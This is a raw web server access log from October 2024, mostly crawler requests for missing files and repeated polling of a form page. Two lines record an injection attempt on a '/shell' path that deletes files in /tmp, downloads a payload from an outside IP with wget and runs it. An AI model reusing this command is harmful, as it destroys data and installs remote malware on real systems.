156.59.198.135 - - [18/Oct/2024:18:02:17 +0200] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/12430617.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
178.165.176.165 - - [18/Oct/2024:18:02:37 +0200] "GET /entry.php?id=10271&&ser=267296 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=267236" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0"
178.165.176.165 - - [18/Oct/2024:18:02:37 +0200] "GET /gui/javascript/form_form.js?1729267357 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=267296" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0"
156.59.198.135 - - [18/Oct/2024:18:02:38 +0200] "GET /renault.activities.at/htdocs/log/cron/system_mail_3115673.txt HTTP/1.0" 404 321 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [18/Oct/2024:18:03:00 +0200] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/10396214.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [18/Oct/2024:18:03:21 +0200] "GET /renault.activities.at/htdocs/export/xml/data/orders/202109131203_RenOrder.xml HTTP/1.0" 404 328 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
178.165.176.165 - - [18/Oct/2024:18:03:37 +0200] "GET /entry.php?id=10271&&ser=267357 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=267296" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0"
178.165.176.165 - - [18/Oct/2024:18:03:37 +0200] "GET /gui/javascript/form_form.js?1729267417 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=267357" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0"
156.59.198.135 - - [18/Oct/2024:18:03:42 +0200] "GET /renault.activities.at/htdocs/log/cron/system_mail_3115384.txt HTTP/1.0" 404 321 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [18/Oct/2024:18:04:03 +0200] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/12468912.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [18/Oct/2024:18:04:24 +0200] "GET /renault.activities.at/htdocs/log/cron/system_mail_3115465.txt HTTP/1.0" 404 321 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
178.165.176.165 - - [18/Oct/2024:18:04:37 +0200] "GET /entry.php?id=10271&&ser=267417 HTTP/1.1" 200 988 "http://hausegger.activities.at/entry.php?id=10271&&ser=267357" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0"
178.165.176.165 - - [18/Oct/2024:18:04:37 +0200] "GET /gui/javascript/form_form.js?1729267477 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=267417" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0"
156.59.198.135 - - [18/Oct/2024:18:04:45 +0200] "GET /renault.activities.at/htdocs/export/xml/data/orders/202105061803_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [18/Oct/2024:18:05:07 +0200] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/11013205.pdf HTTP/1.0" 404 321 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [18/Oct/2024:18:05:28 +0200] "GET /renault.activities.at/htdocs/export/xml/data/articles/202102221203_RenArticle.xml HTTP/1.0" 404 330 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
178.165.176.165 - - [18/Oct/2024:18:05:38 +0200] "GET /entry.php?id=10271&&ser=267477 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=267417" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0"
178.165.176.165 - - [18/Oct/2024:18:05:38 +0200] "GET /gui/javascript/form_form.js?1729267538 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=267477" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0"
156.59.198.135 - - [18/Oct/2024:18:05:49 +0200] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/10963711.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [18/Oct/2024:18:06:10 +0200] "GET /renault.activities.at/htdocs/export/xml/data/articles/202009151503_RenArticle.xml HTTP/1.0" 404 331 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [18/Oct/2024:18:06:31 +0200] "GET /renault.activities.at/htdocs/log/cron/reminder_mailing_3116165.txt HTTP/1.0" 404 323 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
178.165.176.165 - - [18/Oct/2024:18:06:38 +0200] "GET /entry.php?id=10271&&ser=267538 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=267477" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0"
178.165.176.165 - - [18/Oct/2024:18:06:38 +0200] "GET /gui/javascript/form_form.js?1729267598 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=267538" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0"
156.59.198.136 - - [18/Oct/2024:18:06:52 +0200] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/11794968.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [18/Oct/2024:18:07:14 +0200] "GET /renault.activities.at/htdocs/log/cron/autologout_3115588.txt HTTP/1.0" 404 318 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [18/Oct/2024:18:07:35 +0200] "GET /renault.activities.at/htdocs/log/cron/exportXML_3116052.txt HTTP/1.0" 404 320 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
178.165.176.165 - - [18/Oct/2024:18:07:38 +0200] "GET /entry.php?id=10271&&ser=267598 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=267538" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0"
178.165.176.165 - - [18/Oct/2024:18:07:38 +0200] "GET /gui/javascript/form_form.js?1729267658 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=267598" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0"
156.59.198.135 - - [18/Oct/2024:18:07:56 +0200] "GET /renault.activities.at/htdocs/export/xml/data/orders/202009291603_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [18/Oct/2024:18:08:17 +0200] "GET /renault.activities.at/htdocs/export/xml/data/articles/202010121003_RenArticle.xml HTTP/1.0" 404 330 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [18/Oct/2024:18:08:38 +0200] "GET /renault.activities.at/htdocs/export/xml/data/orders/202106281203_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
178.165.176.165 - - [18/Oct/2024:18:08:38 +0200] "GET /entry.php?id=10271&&ser=267658 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=267598" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0"
178.165.176.165 - - [18/Oct/2024:18:08:39 +0200] "GET /gui/javascript/form_form.js?1729267719 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=267658" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0"
156.59.198.135 - - [18/Oct/2024:18:08:59 +0200] "GET /renault.activities.at/htdocs/log/cron/system_mail_3116346.txt HTTP/1.0" 404 321 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [18/Oct/2024:18:09:20 +0200] "GET /renault.2web.at/htdocs/export/txt/factura/FacturaExport20141107114507.txt HTTP/1.0" 404 324 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
178.165.176.165 - - [18/Oct/2024:18:09:39 +0200] "GET /entry.php?id=10271&&ser=267719 HTTP/1.1" 200 988 "http://hausegger.activities.at/entry.php?id=10271&&ser=267658" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0"
178.165.176.165 - - [18/Oct/2024:18:09:39 +0200] "GET /gui/javascript/form_form.js?1729267779 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=267719" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0"
156.59.198.135 - - [18/Oct/2024:18:09:41 +0200] "GET /renault.activities.at/htdocs/log/cron/reminder_mailing_3116537.txt HTTP/1.0" 404 323 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [18/Oct/2024:18:10:03 +0200] "GET /renault.activities.at/htdocs/export/txt/factura/FacturaExport20140429160227.txt HTTP/1.0" 404 328 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [18/Oct/2024:18:10:24 +0200] "GET /renault.activities.at/htdocs/log/cron/system_mail_3115192.txt HTTP/1.0" 404 320 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
178.165.176.165 - - [18/Oct/2024:18:10:39 +0200] "GET /entry.php?id=10271&&ser=267779 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=267719" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0"
178.165.176.165 - - [18/Oct/2024:18:10:39 +0200] "GET /gui/javascript/form_form.js?1729267839 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=267779" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0"
156.59.198.136 - - [18/Oct/2024:18:10:45 +0200] "GET /renault.activities.at/htdocs/export/xml/data/orders/202101051203_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
178.165.176.165 - - [18/Oct/2024:18:11:39 +0200] "GET /entry.php?id=10271&&ser=267839 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=267779" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0"
178.165.176.165 - - [18/Oct/2024:18:11:39 +0200] "GET /gui/javascript/form_form.js?1729267899 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=267839" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0"
178.165.176.165 - - [18/Oct/2024:18:12:40 +0200] "GET /entry.php?id=10271&&ser=267899 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=267839" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0"
178.165.176.165 - - [18/Oct/2024:18:12:40 +0200] "GET /gui/javascript/form_form.js?1729267960 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=267899" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0"
178.165.176.165 - - [18/Oct/2024:18:13:40 +0200] "GET /entry.php?id=10271&&ser=267960 HTTP/1.1" 200 986 "http://hausegger.activities.at/entry.php?id=10271&&ser=267899" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0"
178.165.176.165 - - [18/Oct/2024:18:13:40 +0200] "GET /gui/javascript/form_form.js?1729268020 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=267960" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0"
156.59.198.136 - - [18/Oct/2024:18:14:22 +0200] "GET /renault.activities.at/htdocs/log/cron/system_mail_3115735.txt HTTP/1.0" 404 321 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
178.165.176.165 - - [18/Oct/2024:18:14:40 +0200] "GET /entry.php?id=10271&&ser=268020 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=267960" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0"
178.165.176.165 - - [18/Oct/2024:18:14:40 +0200] "GET /gui/javascript/form_form.js?1729268080 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=268020" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0"
156.59.198.136 - - [18/Oct/2024:18:14:44 +0200] "GET /renault.2web.at/stats/lang/tooltips_w/awstats-tt-kr.txt HTTP/1.0" 404 313 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [18/Oct/2024:18:15:05 +0200] "GET /renault.activities.at/htdocs/export/xml/data/orders/201908121303_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [18/Oct/2024:18:15:27 +0200] "GET /renault.activities.at/htdocs/export/xml/data/orders/202006121103_RenOrder.xml HTTP/1.0" 404 328 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
178.165.176.165 - - [18/Oct/2024:18:15:41 +0200] "GET /entry.php?id=10271&&ser=268080 HTTP/1.1" 200 986 "http://hausegger.activities.at/entry.php?id=10271&&ser=268020" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0"
178.165.176.165 - - [18/Oct/2024:18:15:41 +0200] "GET /gui/javascript/form_form.js?1729268141 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=268080" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0"
156.59.198.135 - - [18/Oct/2024:18:15:48 +0200] "GET /renault.activities.at/htdocs/log/cron/system_mail_3116311.txt HTTP/1.0" 404 320 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [18/Oct/2024:18:16:09 +0200] "GET /renault.activities.at/htdocs/log/cron/reminder_mailing_3116460.txt HTTP/1.0" 404 323 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [18/Oct/2024:18:16:31 +0200] "GET /renault.activities.at/htdocs/export/xml/data/orders/202010010903_RenOrder.xml HTTP/1.0" 404 328 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
178.165.176.165 - - [18/Oct/2024:18:16:41 +0200] "GET /entry.php?id=10271&&ser=268141 HTTP/1.1" 200 986 "http://hausegger.activities.at/entry.php?id=10271&&ser=268080" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0"
178.165.176.165 - - [18/Oct/2024:18:16:41 +0200] "GET /gui/javascript/form_form.js?1729268201 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=268141" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0"
156.192.148.98 - - [18/Oct/2024:18:16:51 +0200] "GET /shell?cd+/tmp;rm+-rf+*;wget+ 129.159.107.197/jaws;sh+/tmp/jaws" 400 383 "-" "-"
156.59.198.136 - - [18/Oct/2024:18:16:52 +0200] "GET /renault.activities.at/htdocs/log/cron/system_mail_3115202.txt HTTP/1.0" 404 320 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.192.148.98 - - [18/Oct/2024:18:16:59 +0200] "GET /shell?cd+/tmp;rm+-rf+*;wget+ 129.159.107.197/jaws;sh+/tmp/jaws" 400 383 "-" "-"
156.59.198.136 - - [18/Oct/2024:18:17:13 +0200] "GET /renault.activities.at/htdocs/log/cron/reminder_mailing_3115698.txt HTTP/1.0" 404 323 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [18/Oct/2024:18:17:34 +0200] "GET /renault.activities.at/htdocs/log/cron/system_mail_3115374.txt HTTP/1.0" 404 321 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
178.165.176.165 - - [18/Oct/2024:18:17:41 +0200] "GET /entry.php?id=10271&&ser=268201 HTTP/1.1" 200 986 "http://hausegger.activities.at/entry.php?id=10271&&ser=268141" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0"
178.165.176.165 - - [18/Oct/2024:18:17:41 +0200] "GET /gui/javascript/form_form.js?1729268261 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=268201" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0"
156.59.198.135 - - [18/Oct/2024:18:17:56 +0200] "GET /renault.activities.at/htdocs/log/cron/system_mail_3115132.txt HTTP/1.0" 404 320 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [18/Oct/2024:18:18:16 +0200] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/11671594.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [18/Oct/2024:18:18:38 +0200] "GET /renault.activities.at/htdocs/log/cron/reminder_mailing_3116303.txt HTTP/1.0" 404 323 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
178.165.176.165 - - [18/Oct/2024:18:18:41 +0200] "GET /entry.php?id=10271&&ser=268261 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=268201" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0"
178.165.176.165 - - [18/Oct/2024:18:18:42 +0200] "GET /gui/javascript/form_form.js?1729268322 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=268261" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0"
156.59.198.136 - - [18/Oct/2024:18:18:59 +0200] "GET /ed-test.2web.at/stats/lang/tooltips_m/awstats-tt-is.txt HTTP/1.0" 404 312 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [18/Oct/2024:18:19:20 +0200] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/12387891.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [18/Oct/2024:18:19:42 +0200] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/11076800.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
178.165.176.165 - - [18/Oct/2024:18:19:42 +0200] "GET /entry.php?id=10271&&ser=268322 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=268261" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0"
178.165.176.165 - - [18/Oct/2024:18:19:42 +0200] "GET /gui/javascript/form_form.js?1729268382 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=268322" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0"
156.59.198.135 - - [18/Oct/2024:18:20:03 +0200] "GET /renault.activities.at/htdocs/export/xml/data/orders/201912181103_RenOrder.xml HTTP/1.0" 404 328 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [18/Oct/2024:18:20:24 +0200] "GET /renault.activities.at/htdocs/log/cron/importLogisticData_3115165.txt HTTP/1.0" 404 324 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
178.165.176.165 - - [18/Oct/2024:18:20:42 +0200] "GET /entry.php?id=10271&&ser=268382 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=268322" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0"
178.165.176.165 - - [18/Oct/2024:18:20:42 +0200] "GET /gui/javascript/form_form.js?1729268442 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=268382" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0"
156.59.198.136 - - [18/Oct/2024:18:20:45 +0200] "GET /ed-test.activities.at/stats/lang/tooltips_w/awstats-tt-bg.txt HTTP/1.0" 404 316 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [18/Oct/2024:18:21:06 +0200] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/10843283.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [18/Oct/2024:18:21:27 +0200] "GET /renault.activities.at/htdocs/log/cron/system_mail_3115185.txt HTTP/1.0" 404 320 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
178.165.176.165 - - [18/Oct/2024:18:21:42 +0200] "GET /entry.php?id=10271&&ser=268442 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=268382" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0"
178.165.176.165 - - [18/Oct/2024:18:21:43 +0200] "GET /gui/javascript/form_form.js?1729268502 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=268442" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0"
156.59.198.136 - - [18/Oct/2024:18:21:49 +0200] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/11782883.pdf HTTP/1.0" 404 323 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [18/Oct/2024:18:22:10 +0200] "GET /renault.activities.at/htdocs/export/xml/data/orders/202011041003_RenOrder.xml HTTP/1.0" 404 328 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [18/Oct/2024:18:22:31 +0200] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/12076181.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
178.165.176.165 - - [18/Oct/2024:18:22:43 +0200] "GET /entry.php?id=10271&&ser=268502 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=268442" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0"
178.165.176.165 - - [18/Oct/2024:18:22:43 +0200] "GET /gui/javascript/form_form.js?1729268563 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=268502" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0"
